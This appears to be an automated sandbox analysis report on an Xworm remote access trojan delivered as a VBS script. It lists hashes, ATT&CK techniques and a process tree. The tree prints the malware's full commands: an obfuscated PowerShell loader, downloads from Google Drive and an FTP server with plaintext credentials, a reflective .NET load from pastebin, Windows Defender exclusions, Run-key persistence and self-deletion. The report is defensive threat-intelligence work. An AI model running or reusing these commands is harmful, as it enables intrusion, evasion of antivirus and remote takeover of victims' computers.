xworm | 7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d

General

Target

7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d.vbs
Size

681KB
MD5

746d8713599ad10435ccced5549288b5
SHA1

457928dea2de0daa5742f05d51ab8b18aefb893a
SHA256

7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d
SHA512

dc1f3da919b6b8e9044f489ccb0fdf95f18ddd70cbf7dd12a4a01adac0876d5b2a2ddbbdafa6384ead6f769b9e71827bf9dc67fcd8fae146e28234b89fff42b4
SSDEEP

1536:9SSSSSSSSSSSSSSSSSSSSSSSx22222222222222222222222222222222222222v:UChJDK

Score

10^/10

xworm defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/1964-79-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 8 IoCs

flow	pid	Process
6	2140	powershell.exe
14	2140	powershell.exe
18	2140	powershell.exe
20	2140	powershell.exe
22	2140	powershell.exe
24	2140	powershell.exe
25	2140	powershell.exe
28	2880	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3128	powershell.exe
2880	powershell.exe
1792	powershell.exe
4852	powershell.exe
2392	powershell.exe
2140	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk	RegAsm.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk	RegAsm.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegAsm = "C:\\Users\\Admin\\AppData\\Roaming\\RegAsm.exe"	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ggc = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\xkiqv.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
21	pastebin.com
22	pastebin.com
28	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2880 set thread context of 1964	2880	powershell.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2392	powershell.exe
2392	powershell.exe
2140	powershell.exe
2140	powershell.exe
2140	powershell.exe
1792	powershell.exe
4852	powershell.exe
1792	powershell.exe
4852	powershell.exe
3128	powershell.exe
3128	powershell.exe
2880	powershell.exe
2880	powershell.exe
2880	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	1964	RegAsm.exe
Token: SeDebugPrivilege	1964	RegAsm.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3660 wrote to memory of 2392	3660	WScript.exe	82
PID 3660 wrote to memory of 2392	3660	WScript.exe	82
PID 2392 wrote to memory of 2140	2392	powershell.exe	84
PID 2392 wrote to memory of 2140	2392	powershell.exe	84
PID 2140 wrote to memory of 1792	2140	powershell.exe	87
PID 2140 wrote to memory of 1792	2140	powershell.exe	87
PID 2140 wrote to memory of 4852	2140	powershell.exe	88
PID 2140 wrote to memory of 4852	2140	powershell.exe	88
PID 2140 wrote to memory of 1436	2140	powershell.exe	89
PID 2140 wrote to memory of 1436	2140	powershell.exe	89
PID 2140 wrote to memory of 3128	2140	powershell.exe	92
PID 2140 wrote to memory of 3128	2140	powershell.exe	92
PID 2140 wrote to memory of 2880	2140	powershell.exe	94
PID 2140 wrote to memory of 2880	2140	powershell.exe	94
PID 2140 wrote to memory of 3968	2140	powershell.exe	95
PID 2140 wrote to memory of 3968	2140	powershell.exe	95
PID 2880 wrote to memory of 1964	2880	powershell.exe	96
PID 2880 wrote to memory of 1964	2880	powershell.exe	96
PID 2880 wrote to memory of 1964	2880	powershell.exe	96
PID 2880 wrote to memory of 1964	2880	powershell.exe	96
PID 2880 wrote to memory of 1964	2880	powershell.exe	96
PID 2880 wrote to memory of 1964	2880	powershell.exe	96
PID 2880 wrote to memory of 1964	2880	powershell.exe	96
PID 2880 wrote to memory of 1964	2880	powershell.exe	96

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$KqwDD = 'OwB9四いуDs四いуKQ四いуg四いуCk四いуI四いу四いуn四いуGU四いуdQBy四いуHQ四いуJw四いуg四いуCw四いуI四いуBl四いуGo四いуdwB6四いуGg四いуJ四いу四いуg四いуCw四いуI四いу四いуn四いуGg四いуd四いуB0四いуH四いу四いуcw四いу6四いуC8四いуLwBw四いуGE四いуcwB0四いуGU四いуYgBp四いуG4四いуLgBj四いуG8四いуbQ四いуv四いуHI四いуYQB3四いуC8四いуSwBl四いуEE四いуc四いуBB四いуFY四いуYQBi四いуCc四いуI四いу四いуo四いуC四いу四いуXQBd四いуFs四いуd四いуBj四いуGU四いуagBi四いуG8四いуWw四いуg四いуCw四いуI四いуBs四いуGw四いуdQBu四いуCQ四いуI四いу四いуo四いуGU四いуawBv四いуHY四いуbgBJ四いуC4四いуKQ四いуg四いуCc四いуSQBW四いуEY四いуcgBw四いуCc四いуI四いу四いуo四いуGQ四いуbwBo四いуHQ四いуZQBN四いуHQ四いуZQBH四いуC4四いуKQ四いуn四いуDE四いуcwBz四いуGE四いуb四いуBD四いуC4四いуMwB5四いуHI四いуYQBy四いуGI四いуaQBM四いуHM四いуcwBh四いуGw四いуQw四いуn四いуCg四いуZQBw四いуHk四いуV四いуB0四いуGU四いуRw四いуu四いуCk四いуI四いуBG四いуFM四いуdQB2四いуHc四いуJ四いу四いуg四いуCg四いуZ四いуBh四いуG8四いуT四いу四いуu四いуG4四いуaQBh四いуG0四いуbwBE四いуHQ四いуbgBl四いуHI四いуcgB1四いуEM四いуOg四いу6四いуF0四いуbgBp四いуGE四いуbQBv四いуEQ四いуc四いуBw四いуEE四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуDs四いуKQ四いуg四いуCk四いуI四いу四いуn四いуEE四いуJw四いуg四いуCw四いуI四いу四いуn四いуJMhOgCTISc四いуI四いу四いуo四いуGU四いуYwBh四いуGw四いуc四いуBl四いуFI四いуLgBn四いуFM四いуegBD四いуEI四いуb四いу四いуk四いуC四いу四いуK四いуBn四いуG4四いуaQBy四いуHQ四いуUw四いу0四いуDY四いуZQBz四いуGE四いуQgBt四いуG8四いуcgBG四いуDo四いуOgBd四いуHQ四いуcgBl四いуHY四いуbgBv四いуEM四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуEY四いуUwB1四いуHY四いуdw四いуk四いуC四いу四いуXQBd四いуFs四いуZQB0四いуHk四いуQgBb四いуDs四いуJw四いуl四いуEk四いуa四いуBx四いуFI四いуW四いу四いуl四いуCc四いуI四いу四いу9四いуC四いу四いуZQBq四いуHc四いуegBo四いуCQ四いуOw四いуp四いуC四いу四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いуg四いуCg四いуZwBu四いуGk四いуcgB0四いуFM四いуZ四いуBh四いуG8四いуb四いуBu四いуHc四いуbwBE四いуC4四いуegBE四いуHo四いуQgBF四いуCQ四いуI四いу四いу9四いуC四いу四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いу7四いуDg四いуRgBU四いуFU四いуOg四いу6四いуF0四いуZwBu四いуGk四いуZ四いуBv四いуGM四いуbgBF四いуC4四いуd四いуB4四いуGU四いуV四いу四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуFs四いуI四いу四いу9四いуC四いу四いуZwBu四いуGk四いуZ四いуBv四いуGM四いуbgBF四いуC4四いуegBE四いуHo四いуQgBF四いуCQ四いуOw四いуp四いуHQ四いуbgBl四いуGk四いуb四いуBD四いуGI四いуZQBX四いуC4四いуd四いуBl四いуE4四いуI四いуB0四いуGM四いуZQBq四いуGI四いуTw四いуt四いуHc四いуZQBO四いуCg四いуI四いу四いу9四いуC四いу四いуegBE四いуHo四いуQgBF四いуCQ四いуOw四いуp四いуCg四いуZQBz四いуG8四いуc四いуBz四いуGk四いуZ四いу四いуu四いуHo四いуR四いуB6四いуEI四いуRQ四いуk四いуDs四いуKQ四いуg四いуCc四いуd四いуB4四いуHQ四いуLg四いуx四いуD四いу四いуT四いуBM四いуEQ四いуLw四いуx四いуD四いу四いуLwBy四いуGU四いуd四いуBw四いуHk四いуcgBj四いуH四いу四いуVQ四いуv四いуHI四いуYg四いуu四いуG0四いуbwBj四いуC4四いуd四いуBh四いуHI四いуYgB2四いуGs四いуYwBz四いуGU四いуZ四いу四いуu四いуH四いу四いуd四いуBm四いуE四いу四いуMQB0四いуGE四いуcgBi四いуHY四いуawBj四いуHM四いуZQBk四いуC8四いуLw四いу6四いуH四いу四いуd四いуBm四いуCc四いуI四いу四いуo四いуGc四いуbgBp四いуHI四いуd四いуBT四いуGQ四いуYQBv四いуGw四いуbgB3四いуG8四いуR四いу四いуu四いуHo四いуR四いуB6四いуEI四いуRQ四いуk四いуC四いу四いуPQ四いуg四いуGc四いуUwB6四いуEM四いуQgBs四いуCQ四いуOw四いуp四いуCc四いуQ四いуB四いу四いуH四いу四いуSg四いу4四いуDc四いуNQ四いуx四いуDI四いуbwBy四いуH四いу四いуcgBl四いуH四いу四いуbwBs四いуGU四いуdgBl四いуGQ四いуJw四いуs四いуCc四いуMQB0四いуGE四いуcgBi四いуHY四いуawBj四いуHM四いуZQBk四いуCc四いуK四いуBs四いуGE四いуaQB0四いуG4四いуZQBk四いуGU四いуcgBD四いуGs四いуcgBv四いуHc四いуd四いуBl四いуE4四いуLgB0四いуGU四いуTg四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуG8四いуLQB3四いуGU四いуbg四いуg四いуD0四いуI四いуBz四いуGw四いуYQBp四いуHQ四いуbgBl四いуGQ四いуZQBy四いуEM四いуLgB6四いуEQ四いуegBC四いуEU四いуJ四いу四いу7四いуDg四いуRgBU四いуFU四いуOg四いу6四いуF0四いуZwBu四いуGk四いуZ四いуBv四いуGM四いуbgBF四いуC4四いуd四いуB4四いуGU四いуV四いу四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуFs四いуI四いу四いу9四いуC四いу四いуZwBu四いуGk四いуZ四いуBv四いуGM四いуbgBF四いуC4四いуegBE四いуHo四いуQgBF四いуCQ四いуOw四いуp四いуHQ四いуbgBl四いуGk四いуb四いуBD四いуGI四いуZQBX四いуC4四いуd四いуBl四いуE4四いуI四いуB0四いуGM四いуZQBq四いуGI四いуTw四いуt四いуHc四いуZQBO四いуCg四いуI四いу四いу9四いуC四いу四いуegBE四いуHo四いуQgBF四いуCQ四いуOwBn四いуFM四いуegBD四いуEI四いуb四いу四いуk四いуDs四いуMg四いуx四いуHM四いуb四いуBU四いуDo四いуOgBd四いуGU四いуc四いуB5四いуFQ四いуb四いуBv四いуGM四いуbwB0四いуG8四いуcgBQ四いуHk四いуd四いуBp四いуHI四いуdQBj四いуGU四いуUw四いуu四いуHQ四いуZQBO四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWw四いуg四いуD0四いуI四いуBs四いуG8四いуYwBv四いуHQ四いуbwBy四いуF四いу四いуeQB0四いуGk四いуcgB1四いуGM四いуZQBT四いуDo四いуOgBd四いуHI四いуZQBn四いуGE四いуbgBh四いуE0四いуd四いуBu四いуGk四いуbwBQ四いуGU四いуYwBp四いуHY四いуcgBl四いуFM四いуLgB0四いуGU四いуTg四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуFs四いуOwB9四いуGU四いуdQBy四いуHQ四いуJ四いуB7四いуC四いу四いуPQ四いуg四いуGs四いуYwBh四いуGI四いуb四いуBs四いуGE四いуQwBu四いуG8四いуaQB0四いуGE四いуZ四いуBp四いуGw四いуYQBW四いуGU四いуd四いуBh四いуGM四いуaQBm四いуGk四いуd四いуBy四いуGU四いуQwBy四いуGU四いуdgBy四いуGU四いуUw四いу6四いуDo四いуXQBy四いуGU四いуZwBh四いуG4四いуYQBN四いуHQ四いуbgBp四いуG8四いуU四いуBl四いуGM四いуaQB2四いуHI四いуZQBT四いуC4四いуd四いуBl四いуE4四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуHs四いуI四いуBl四いуHM四いуb四いуBl四いуH0四いуI四いуBm四いуC8四いуI四いу四いуw四いуC四いу四いуd四いу四いуv四いуC四いу四いуcg四いуv四いуC四いу四いуZQB4四いуGU四いуLgBu四いуHc四いуbwBk四いуHQ四いуdQBo四いуHM四いуI四いу四いу7四いуCc四いуM四いу四いу4四いуDE四いуI四いуBw四いуGU四いуZQBs四いуHM四いуJw四いуg四いуGQ四いуbgBh四いуG0四いуbQBv四いуGM四いуLQ四いуg四いуGU四いуe四いуBl四いуC4四いуb四いуBs四いуGU四いуa四いуBz四いуHI四いуZQB3四いуG8四いуc四いу四いу7四いуC四いу四いуZQBj四いуHI四いуbwBm四いуC0四いуI四いу四いуp四いуC四いу四いуJwBw四いуHU四いуd四いуBy四いуGE四いуd四いуBT四いуFw四いуcwBt四いуGE四いуcgBn四いуG8四いуcgBQ四いуFw四いуdQBu四いуGU四いуTQ四いуg四いуHQ四いуcgBh四いуHQ四いуUwBc四いуHM四いуdwBv四いуGQ四いуbgBp四いуFc四いуX四いуB0四いуGY四いуbwBz四いуG8四いуcgBj四いуGk四いуTQBc四いуGc四いуbgBp四いуG0四いуYQBv四いуFI四いуX四いуBh四いуHQ四いуYQBE四いуH四いу四いуc四いуBB四いуFw四いуJw四いуg四いуCs四いуI四いуBG四いуEc四いуcgBV四いуEE四いуJ四いу四いуg四いуCg四いуI四いуBu四いуG8四いуaQB0四いуGE四いуbgBp四いуHQ四いуcwBl四いуEQ四いуLQ四いуg四いуCc四いуJQBJ四いуGg四いуcQBS四いуFg四いуJQ四いуn四いуC四いу四いуbQBl四いуHQ四いуSQ四いуt四いуHk四いуc四いуBv四いуEM四いуI四いу四いу7四いуC四いу四いуd四いуBy四いуGE四いуd四いуBz四いуGU四いуcgBv四いуG4四いуLw四いуg四いуHQ四いуZQBp四いуHU四いуcQ四いуv四いуC四いу四いуUQBB四いуGo四いуegBJ四いуC四いу四いуZQB4四いуGU四いуLgBh四いуHM四いуdQB3四いуC四いу四いуZQB4四いуGU四いуLgBs四いуGw四いуZQBo四いуHM四いуcgBl四いуHc四いуbwBw四いуC四いу四いуOw四いуp四いуCc四いуdQBz四いуG0四いуLgBu四いуGk四いуdwBw四いуFU四いуX四いу四いуn四いуC四いу四いуKw四いуg四いуH四いу四いуagBM四いуGo四いуTQ四いуk四いуCg四いуI四いу四いу9四いуC四いу四いуUQBB四いуGo四いуegBJ四いуDs四いуKQ四いуg四いуGU四いуbQBh四いуE4四いуcgBl四いуHM四いуVQ四いу6四いуDo四いуXQB0四いуG4四いуZQBt四いуG4四いуbwBy四いуGk四いуdgBu四いуEU四いуWw四いуg四いуCs四いуI四いу四いуn四いуFw四いуcwBy四いуGU四いуcwBV四いуFw四いуOgBD四いуCc四いуK四いу四いуg四いуD0四いуI四いуBG四いуEc四いуcgBV四いуEE四いуJ四いу四いу7四いуCk四いуJwB1四いуHM四いуbQ四いуu四いуG4四いуaQB3四いуH四いу四いуVQBc四いуCc四いуI四いу四いуr四いуC四いу四いуc四いуBq四いуEw四いуagBN四いуCQ四いуI四いу四いуs四いуEI四いуSwBM四いуFI四いуVQ四いуk四いуCg四いуZQBs四いуGk四いуRgBk四いуGE四いуbwBs四いуG4四いуdwBv四いуEQ四いуLgBp四いуE0四いуbwBh四いуEk四いуJ四いу四いу7四いуDg四いуRgBU四いуFU四いуOg四いу6四いуF0四いуZwBu四いуGk四いуZ四いуBv四いуGM四いуbgBF四いуC4四いуd四いуB4四いуGU四いуV四いу四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуFs四いуI四いу四いу9四いуC四いу四いуZwBu四いуGk四いуZ四いуBv四いуGM四いуbgBF四いуC4四いуaQBN四いуG8四いуYQBJ四いуCQ四いуOw四いуp四いуHQ四いуbgBl四いуGk四いуb四いуBD四いуGI四いуZQBX四いуC4四いуd四いуBl四いуE4四いуI四いуB0四いуGM四いуZQBq四いуGI四いуTw四いуt四いуHc四いуZQBO四いуCg四いуI四いу四いу9四いуC四いу四いуaQBN四いуG8四いуYQBJ四いуCQ四いуOwB9四いуDs四いуI四いу四いуp四いуCc四いуd四いуBP四いуEw四いуYwBf四いуEs四いуYQ四いуz四いуFo四いуZgBv四いуFg四いуMgBK四いуEo四いуcgBW四いуGg四いуbQBW四いуDk四いуYwBt四いуDk四いуW四いуBz四いуHU四いуW四いуBt四いуGo四いуMQBn四いуDE四いуJw四いуg四いуCs四いуI四いуBl四いуEk四いуVQBl四いуHI四いуJ四いу四いуo四いуC四いу四いуPQ四いуg四いуGU四いуSQBV四いуGU四いуcg四いуk四いуHs四いуI四いуBl四いуHM四いуb四いуBl四いуH0四いуOw四いуg四いуCk四いуJw四いуy四いуDQ四いуdQBY四いуEo四いуV四いуBx四いуGE四いуbQBn四いуHk四いуTQB0四いуEY四いуegBh四いуGs四いуU四いуBS四いуDE四いуcQBf四いуEk四いуdgBH四いуGk四いуW四いуBO四いуGQ四いуcQBh四いуE4四いуMQ四いуn四いуC四いу四いуKw四いуg四いуGU四いуSQBV四いуGU四いуcg四いуkACgAIAA9ACAAZQBJAFUAZQByACQAewAgACkAIABKAGkAcABYAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAEoAaQBwAFgAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABlAEk四いуVQBlAHIAJAA7ACkAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAcABqAEwAagBNACQAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABwAGoATABqAE0AJAB7ACAAKQAgAEsAZQBzAHQARAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAEsAZQBzAHQARAAkACAAOwA=';$lgMxs = $KqwDD.replace('四いу' , 'A') ;$hfSlS = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $lgMxs ) ); $hfSlS = $hfSlS[-1..-$hfSlS.Length] -join '';$hfSlS = $hfSlS.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d.vbs');powershell $hfSlS
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $DtseK = $host.Version.Major.Equals(2) ;if ( $DtseK ) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$reUIe = 'https://drive.google.com/uc?export=download&id=';$qXpiJ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qXpiJ ) {$reUIe = ($reUIe + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$reUIe = ($reUIe + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = (New-Object Net.WebClient);$IaoMi.Encoding = [System.Text.Encoding]::UTF8;$IaoMi.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$EBzDz = (New-Object Net.WebClient);$EBzDz.Encoding = [System.Text.Encoding]::UTF8;$EBzDz.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $EBzDz.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$EBzDz.dispose();$EBzDz = (New-Object Net.WebClient);$EBzDz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $EBzDz.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d.vbs';[Byte[]] $wvuSF = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $wvuSF ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'baVApAeK/war/moc.nibetsap//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4852
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:1436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\xkiqv.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2880
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1964
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\7e716d3e3294621ecbfca2fb2344659adab0186027eb9cf4511617db9bf8896d.vbs"
      4⤵
      PID:3968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
d428601a5262bd0a7f47f88868b4e5d4

SHA1
0b917a6054caef568f5bdacc535f694934cc1975

SHA256
f4ddf856d98ac53e44b83c48f7f894a2dd58dd5d65616549fd9ecc003299f59b

SHA512
7c2f7fd8894c0b1dc7a704907518a37812996b861daf23fa4fa8c5c5ff018ec440a96ace6106c6c3f1b5f94465277c3deeb65eb3d324b6d946390018004940c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\xkiqv.ps1

Filesize
202KB

MD5
6a1029cac402514a8f25a0a2b18cca3a

SHA1
05adf10741b5f73981ffac1f05d09086bd5cac4f

SHA256
eadb6bca7d646f36590e12895d99a3f4b2879f16ecfb39ffe21f48379cd2ee93

SHA512
27684a821787d8744f1da06bda750e748cc459b1cf3f1ccc73d8992040782830f318b2e6b9f62aad489e0144c5c7bfed7c19a6321ad28e3714e62f80b20a11c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1a74323668858612d7aef1cd4663860b

SHA1
d1cfb16416cad73bda185ba8034bd68b5c6ae4d5

SHA256
835732f87327a039fd60b1d20cc1ed0d5e163c06c860e31abfe7d6dabb722a09

SHA512
2a93e97dce7a971bbd707408830f7a190e7a50d83e59538d3acee1505387d31d99fef6c88f2e71ee57a4797dddfdf01a422172e66a43ee351f93e3693730c81b

Download Submit
